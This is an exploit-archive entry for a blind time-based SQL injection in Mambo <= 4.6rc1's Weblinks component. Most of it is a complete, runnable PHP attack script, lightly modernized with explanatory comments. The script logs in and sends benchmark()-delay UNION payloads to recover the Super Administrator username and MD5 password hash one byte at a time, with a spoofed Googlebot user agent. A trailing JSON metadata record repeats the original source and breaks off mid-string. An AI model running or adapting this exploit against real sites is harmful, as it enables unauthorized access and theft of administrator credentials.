Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit
2006-06-17T00:00:00
ID 1337DAY-ID-522 Type zdt Reporter rgod Modified 2006-06-17T00:00:00
Description
Exploit for unknown platform in category web applications
======================================================
Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit
======================================================
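#!/usr/bin/php -q -d short_open_tag=on
<?php
// Mambo <= 4.6rc1 com_weblinks blind SQL injection: recovers the Super
// Administrator username and MD5 password hash one byte at a time by
// timing injected benchmark() delays.  Needs a valid front-end account.
//
// Opened with the full '<?php' tag: the shebang only forces
// short_open_tag on when the file is executed directly.  Run the
// documented way ("php exploit.php ...") on a build with
// short_open_tag=Off, the short '<?' tag made PHP print the source
// instead of executing it.
echo "Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\r\n";
echo "disclosure exploit (benchmark() vesion)\r\n";
echo "by rgod [email protected]\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "this is called the Sun-Tzu 'trascendental guru meditation' tecnique\r\n\r\n";
// host, path, user and pass are mandatory positionals; anything after
// them is parsed as an option further down
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to Mambo\r\n";
echo "user/pass: you need an account\r\n";
echo "Options:\r\n";
echo " -T[prefix] specify a table prefix different from 'mos_'\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /mambo/ username password\r\n";
die;
}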
/*
 explanation:
sql injection in "title" argument when you submit a web link, poc:
start mysql daemon with log option...
>mysqld --log=mambo.txt
now login, go to "Submit Weblink" feature, in "Name: " field type:
99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*
in mambo.txt we have:
13 Query SELECT id FROM mos_weblinks
WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'
the injection is blind, but as the logged query shows, MySQL's benchmark() function
can be used to introduce measurable time delays and so answer yes/no questions about table contents
this works regardless of magic_quotes_gpc settings
*/
// Run without limits and without noise: each timing probe can take many
// seconds, and every notice/warning is silenced.
ini_set('default_socket_timeout', 5);
ini_set('max_execution_time', 0);
error_reporting(0);
// Hex-dump helper (only referenced from the commented-out debug lines).
// Returns the bytes of $string as two-digit hex, then CRLF, then the same
// bytes as printable ASCII with bytes <= 32 or > 126 shown as '.'; both
// halves are broken into rows of 15 bytes.
function quick_dump($string)
{
    $hex='';
    $ascii='';
    $len=strlen($string);
    for ($pos=0; $pos<$len; $pos++)
    {
        $byte=ord($string[$pos]);
        $hex.=' '.str_pad(dechex($byte),2,'0',STR_PAD_LEFT);
        $ascii.=($byte<=32 || $byte>126) ? ' .' : ' '.$string[$pos];
        // start a new row after every 15th byte
        if (($pos+1)%15==0) { $hex.="\r\n"; $ascii.="\r\n"; }
    }
    return $hex."\r\n".$ascii;
}
// Shape accepted for the -P option: dotted-quad ip:port.  The parentheses
// are the PCRE delimiters (preg_match accepts bracket-style delimiters).
// Not anchored with ^/$, so text around the ip:port is tolerated.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
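// Send one raw HTTP request and capture the whole reply into the global
// $html.  Direct mode connects to $host:$port; proxy mode connects to the
// ip:port in $proxy (validated against $proxy_regex) and relies on the
// caller having put an absolute URL in the request line.  Every failure
// path prints a message and die()s.  The blind-injection loops only use
// how long this call takes; the login step reads Set-Cookie from $html.
function sendpacketii($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='') {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
            echo 'No response from '.$host.':'.$port; die;
        }
    }
    else {
        if (!preg_match($proxy_regex,$proxy)) {
            echo 'Not a valid proxy...';die;
        }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) {
            echo 'No response from proxy...';die;
        }
    }
    fputs($ock,$packet);
    $html='';
    if ($proxy=='') {
        // Read until the peer closes (every request sends Connection: Close)
        while (!feof($ock)) {
            $html.=fgets($ock);
        }
    }
    else {
        // Byte-wise read until EOF *and* the end of the headers (CRLFCRLF)
        // has been seen.  The original tested this with eregi(), which was
        // removed in PHP 7.0; a literal strpos() search is the same check.
        // NOTE(review): a proxy that closes without ever sending a blank
        // line keeps this loop spinning on fread() at EOF; left as-is so
        // the timing behaviour the probes depend on does not change.
        while ((!feof($ock)) or (strpos($html,"\r\n\r\n")===false)) {
            $html.=fread($ock,1);
        }
    }
    fclose($ock);
    #debug
    #echo "\r\n".$html;
}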
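// True when $hash (after trim()) is exactly a 32-character lowercase hex
// string, i.e. the shape of Mambo's stored MD5 password hashes.
// ereg() was removed in PHP 7.0, so the test uses preg_match(); the
// original pattern also lacked a '$' anchor and accepted any string that
// merely *started* with 32 hex digits.  Not called anywhere in this file.
function is_hash($hash)
{
    return preg_match('/^[a-f0-9]{32}$/', trim($hash)) === 1;
}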
// Positional arguments (their presence was checked by the usage block above)
$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
// Option defaults: plain HTTP on port 80, stock 'mos_' table prefix, no proxy
$port=80;
$prefix="mos_";
$proxy="";
// Optional switches, each glued to its value: -p8080  -Pip:port  -Tjos_
for ($n=5; $n<$argc; $n++){
    $arg=$argv[$n];
    switch ($arg[0].$arg[1]) {
        case "-p": $port=str_replace("-p","",$arg); break;
        case "-P": $proxy=str_replace("-P","",$arg); break;
        case "-T": $prefix=str_replace("-T","",$arg); break;
    }
}
// The Mambo path must be absolute and end with a slash, e.g. /mambo/
if (substr($path,0,1)!='/' || substr($path,-1)!='/') {echo 'Error... check the path!'; die;}
// Direct connections use a relative request line; through a proxy the
// request line has to carry the absolute URL
$p = ($proxy=='') ? $path : 'http://'.$host.':'.$port.$path;
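// ---------------------------------------------------------------------
// Step 1: log in with the supplied account and collect the session
// cookies.  The weblink submission form is only reachable to a logged-in
// user, so every later probe replays these cookies.
// ---------------------------------------------------------------------
// Front-end login form fields.  Credentials are urlencode()d: the original
// sent them raw, so a password containing '&', '+', '%' or a space
// corrupted the form body and the login silently failed.
$data ="username=".urlencode($user);
$data.="&passwd=".urlencode($pass);
$data.="&remember=yes";
$data.="&option=login";
$data.="&Submit=login";
$data.="&op2=login";
$data.="&lang=english";
$data.="&return=".urlencode("http://".$host.$path);
$data.="&message=0";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
// Keep the leading "name=value;" token of every Set-Cookie header
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
// No cookie at all, or a cookie being cleared ("name=+;"), means the login
// was rejected.  The original combined the two tests with a bitwise '|':
// strstr()'s string result was coerced to int 0, so the "=+;" case never
// fired (and the coercion throws a TypeError on PHP 8); '||' is intended.
if (strstr($cookie,"=+;") || $cookie=="") {die("Unable to login...");}
echo "Done...\r\ncookie -> ".$cookie."\r\n";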
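// ---------------------------------------------------------------------
// Step 2: blind extraction.  Each request asks the target one yes/no
// question ("is byte $pos of $column in the Super Administrator row equal
// to $byte?") through the injected IF(... benchmark(...) ...) expression
// in the weblink title; the answer is read from the wall-clock time the
// request takes.  The username and password loops of the original were
// identical apart from the column, the candidate bytes and the label, so
// they share the two helpers below.
// ---------------------------------------------------------------------

// Send one probe for ($column, $pos, $byte) and return the elapsed whole
// seconds.  Builds the same com_weblinks "save" request the original
// loops built inline; $p, $host, $cookie and $prefix come from the
// option parsing and login steps above.
function mambo_probe_delay($column, $pos, $byte)
{
    global $p, $host, $cookie, $prefix;
    $starttime=time();
    $sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(".$column.",".$pos.",1))=".$byte.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
    echo "\r\n".$sql."\r\n";
    $sql=urlencode($sql);
    $data ="title=".$sql;
    $data.="&catid=2";
    $data.="&url=http://www.google.com";
    $data.="&description=";
    $data.="&id=0";
    $data.="&option=com_weblinks";
    $data.="&task=save";
    $data.="&ordering=0";
    $data.="&approved=0";
    $data.="&Returnid=0";
    $packet ="POST ".$p."index.php HTTP/1.0\r\n";
    $packet.="User-Agent: Googlebot/2.1\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Accept: text/plain\r\n";
    $packet.="Connection: Close\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Cookie: ".$cookie."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n\r\n";
    $packet.=$data;
    //debug
    //echo quick_dump($packet)."\r\n";
    sendpacketii($packet);
    $endtime=time();
    echo "endtime -> ".$endtime."\r\n";
    $difftime=$endtime - $starttime;
    echo "difftime -> ".$difftime."\r\n";
    return $difftime;
}

// Recover $column byte by byte.  $candidates is the ordered list of byte
// values tried at each position; the first one that delays the response
// by more than seven seconds is taken as the answer.  Candidate 0 acts as
// the terminator: once $pos runs past the end of the value SUBSTRING()
// yields '' and ASCII('') is 0, so chr(0) is appended and the loop ends.
// A position where no candidate matches aborts the whole run.
function mambo_extract($column, $candidates, $label)
{
    $pos=1; $value="";
    while (!strstr($value,chr(0)))
    {
        $found=false;
        foreach ($candidates as $byte)
        {
            if (mambo_probe_delay($column,$pos,$byte) > 7)   //more than seven seconds? we succeed...
            {
                $value.=chr($byte);
                echo $label." -> ".$value."[???]\r\n";
                sleep(2);   // give the server a moment before the next probe
                $found=true;
                break;
            }
        }
        if (!$found) {die("Exploit failed...");}
        $pos++;
    }
    return $value;
}

// Username: any byte value is possible, so try all 256 in order.
$admin=mambo_extract("username", range(0,255), "admin");

// Password hash: a lowercase MD5 hex digest, so only the terminator,
// '0'-'9' and 'a'-'f' need to be tried (same ascending order as before).
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$password=mambo_extract("password", $md5s, "password");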
// Both extraction loops above only finish by reaching their terminator,
// so getting here means both values were recovered in full.
$rule="--------------------------------------------------------------------\r\n";
echo "Exploit succeeded...\r\n"
    .$rule
    ."admin -> ".$admin."\r\n"
    ."password (md5) -> ".$password."\r\n"
    .$rule;
?>
{"published": "2006-06-17T00:00:00", "id": "1337DAY-ID-522", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:28:14", "bulletin": {"published": "2006-06-17T00:00:00", "id": "1337DAY-ID-522", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T01:28:14"}}, "hash": "e8dd10441cbe8c60046fbaf71a4ad2ea43d675f5054a167478f36447de7d8d69", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:28:14", "edition": 1, "title": "Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit", "href": "http://0day.today/exploit/description/522", "modified": "2006-06-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 10, "cvelist": [], "sourceHref": "http://0day.today/exploit/522", "references": [], "reporter": "rgod", "sourceData": "======================================================\r\nMambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit\r\n======================================================\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\\r\\n\";\r\necho \"disclosure exploit (benchmark() vesion)\\r\\n\";\r\necho \"by rgod rgod@autistici.org\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\";\r\necho \"this is called the Sun-Tzu 'trascendental guru meditation' tecnique\\r\\n\\r\\n\";\r\n\r\nif ($argc<5) {\r\necho \"Usage: php \".$argv[0].\" host path user pass OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to Mambo\\r\\n\";\r\necho \"user/pass: you need an account\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -T[prefix] specify a table prefix different from 'mos_'\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho 
\"Example:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /mambo/ username password\\r\\n\";\r\ndie;\r\n}\r\n\r\n/*\r\n explaination:\r\n\r\n sql injection in \"title\" argument when you submit a web link, poc:\r\n start mysql daemon with log option...\r\n\r\n >mysqld --log=mambo.txt\r\n\r\n now login, go to \"Submit Weblink\" feature, in \"Name: \" field type:\r\n\r\n 99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*\r\n\r\n in mambo.txt we have:\r\n\r\n 13 Query SELECT id FROM mos_weblinks\r\n WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'\r\n\r\n injection is blind but, as you can see, we can you use time delays through Mysql\r\n benchmark() function to ask questions about tables\r\n\r\n this works regardless of magic_quotes_gpc settings\r\n\r\n*/\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = 
preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return false;}\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$user=$argv[3];\r\n$pass=$argv[4];\r\n$port=80;\r\n$prefix=\"mos_\";\r\n$proxy=\"\";\r\nfor ($i=5; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-T\")\r\n{\r\n $prefix=str_replace(\"-T\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$data =\"username=\".$user;\r\n$data.=\"&passwd=\".$pass;\r\n$data.=\"&remember=yes\";\r\n$data.=\"&option=login\";\r\n$data.=\"&Submit=login\";\r\n$data.=\"&op2=login\";\r\n$data.=\"&lang=english\";\r\n$data.=\"&return=\".urlencode(\"http://\".$host.$path);\r\n$data.=\"&message=0\";\r\n$packet =\"POST \".$p.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nsendpacketii($packet);\r\n$temp=explode(\"Set-Cookie: \",$html);\r\n$cookie=\"\";\r\nfor ($i=1; $i<=count($temp)-1; $i++)\r\n{\r\n$temp2=explode(\" \",$temp[$i]);\r\n$cookie.=\" \".$temp2[0];\r\n}\r\nif ((strstr($cookie,\"=+;\")) | $cookie==\"\") {die(\"Unable to login...\");}\r\nelse\r\n{\r\necho \"Done...\\r\\ncookie -> \".$cookie.\"\\r\\n\";\r\n}\r\n\r\n$j=1;$admin=\"\";\r\nwhile (!strstr($admin,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\n$starttime=time();\r\n$sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(username,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\necho \"\\r\\n\".$sql.\"\\r\\n\";\r\n$sql=urlencode($sql);\r\n$data =\"title=\".$sql;\r\n$data.=\"&catid=2\";\r\n$data.=\"&url=http://www.google.com\";\r\n$data.=\"&description=\";\r\n$data.=\"&id=0\";\r\n$data.=\"&option=com_weblinks\";\r\n$data.=\"&task=save\";\r\n$data.=\"&ordering=0\";\r\n$data.=\"&approved=0\";\r\n$data.=\"&Returnid=0\";\r\n$packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: 
application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\n//debug\r\n//echo quick_dump($packet).\"\\r\\n\";\r\nsendpacketii($packet);\r\n$endtime=time();\r\necho \"endtime -> \".$endtime.\"\\r\\n\";\r\n$difftime=$endtime - $starttime;\r\necho \"difftime -> \".$difftime.\"\\r\\n\";\r\nif ($difftime > 7) {$admin.=chr($i);echo \"admin -> \".$admin.\"[???]\\r\\n\";sleep(2);break;} //more than seven seconds? we succeed...\r\nif ($i==255) {die(\"Exploit failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$md5s[0]=0;//null\r\n$md5s=array_merge($md5s,range(48,57)); //numbers\r\n$md5s=array_merge($md5s,range(97,102));//a-f letters\r\n//print_r(array_values($md5s));\r\n$j=1;$password=\"\";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$md5s))\r\n{\r\n $starttime=time();\r\n $sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(password,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\n echo \"\\r\\n\".$sql.\"\\r\\n\";\r\n $sql=urlencode($sql);\r\n $data =\"title=\".$sql;\r\n $data.=\"&catid=2\";\r\n $data.=\"&url=http://www.google.com\";\r\n $data.=\"&description=\";\r\n $data.=\"&id=0\";\r\n $data.=\"&option=com_weblinks\";\r\n $data.=\"&task=save\";\r\n $data.=\"&ordering=0\";\r\n $data.=\"&approved=0\";\r\n $data.=\"&Returnid=0\";\r\n $packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\";\r\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n $packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n //debug\r\n //echo quick_dump($packet).\"\\r\\n\";\r\n sendpacketii($packet);\r\n 
$endtime=time();\r\n echo \"endtime -> \".$endtime.\"\\r\\n\";\r\n $difftime=$endtime - $starttime;\r\n echo \"difftime -> \".$difftime.\"\\r\\n\";\r\n if ($difftime > 7) {$password.=chr($i);echo \"password -> \".$password.\"[???]\\r\\n\";sleep(2);break;}\r\n}\r\n if ($i==255) {die(\"Exploit failed...\");}\r\n }\r\n $j++;\r\n}\r\n//if you are here...\r\necho \"Exploit succeeded...\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\necho \"admin -> \".$admin.\"\\r\\n\";\r\necho \"password (md5) -> \".$password.\"\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7aa2323a8c05510e36ec423b400eed59", "key": "sourceHref"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "published"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "e1c13c78b94a1904a3ac51d669e0dd98", "key": "href"}, {"hash": "fb733324659391a715e8ec8f6ebcccc4", "key": "sourceData"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "modified"}, {"hash": "7ad97a3bd9d56ae489f68c15e7e12542", "key": "title"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "8db12d6b291e94cc0663084da9d334bb5f84e6a35d822aeb517931a52898b5a2", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-03-01T23:43:11"}, "dependencies": {"references": [{"type": "centos", "idList": ["CESA-2019:0229"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/WEBEXEC", 
"MSF:EXPLOIT/WINDOWS/LOCAL/WEBEXEC", "MSF:POST/WINDOWS/ESCALATE/UNMARSHAL_CMD_EXEC", "MSF:EXPLOIT/WINDOWS/LOCAL/MS18_8120_WIN32K_PRIVESC", "MSF:POST/ANDROID/GATHER/SUB_INFO", "MSF:EXPLOIT/SOLARIS/LOCAL/RSH_STACK_CLASH_PRIV_ESC", "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION"]}, {"type": "amazon", "idList": ["ALAS-2018-1086"]}, {"type": "saint", "idList": ["SAINT:E218D6FA073276BB012BADF2CCE50F0E", "SAINT:F27F2E7D16F4168597CA2B69C38FA30F"]}, {"type": "dsquare", "idList": ["E-631"]}, {"type": "zdt", "idList": ["1337DAY-ID-29989", "1337DAY-ID-29759", "1337DAY-ID-29438", "1337DAY-ID-27679"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310890871"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_JUL_4025341.NASL", "EULEROS_SA-2016-1036.NASL"]}, {"type": "korelogic", "idList": ["KL-001-2017-007"]}], "modified": "2018-03-01T23:43:11"}, "vulnersScore": 0.3}, "type": "zdt", "lastseen": "2018-03-01T23:43:11", "edition": 2, "title": "Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit", "href": "https://0day.today/exploit/description/522", "modified": "2006-06-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 17, "cvelist": [], "sourceHref": "https://0day.today/exploit/522", "references": [], "reporter": "rgod", "sourceData": "======================================================\r\nMambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit\r\n======================================================\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\\r\\n\";\r\necho \"disclosure exploit (benchmark() vesion)\\r\\n\";\r\necho \"by rgod [email\u00a0protected]\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\";\r\necho \"this is called the Sun-Tzu 'trascendental guru meditation' tecnique\\r\\n\\r\\n\";\r\n\r\nif ($argc<5) {\r\necho \"Usage: php \".$argv[0].\" host path user pass OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to 
Mambo\\r\\n\";\r\necho \"user/pass: you need an account\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -T[prefix] specify a table prefix different from 'mos_'\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Example:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /mambo/ username password\\r\\n\";\r\ndie;\r\n}\r\n\r\n/*\r\n explaination:\r\n\r\n sql injection in \"title\" argument when you submit a web link, poc:\r\n start mysql daemon with log option...\r\n\r\n >mysqld --log=mambo.txt\r\n\r\n now login, go to \"Submit Weblink\" feature, in \"Name: \" field type:\r\n\r\n 99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*\r\n\r\n in mambo.txt we have:\r\n\r\n 13 Query SELECT id FROM mos_weblinks\r\n WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'\r\n\r\n injection is blind but, as you can see, we can you use time delays through Mysql\r\n benchmark() function to ask questions about tables\r\n\r\n this works regardless of magic_quotes_gpc settings\r\n\r\n*/\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction 
sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return 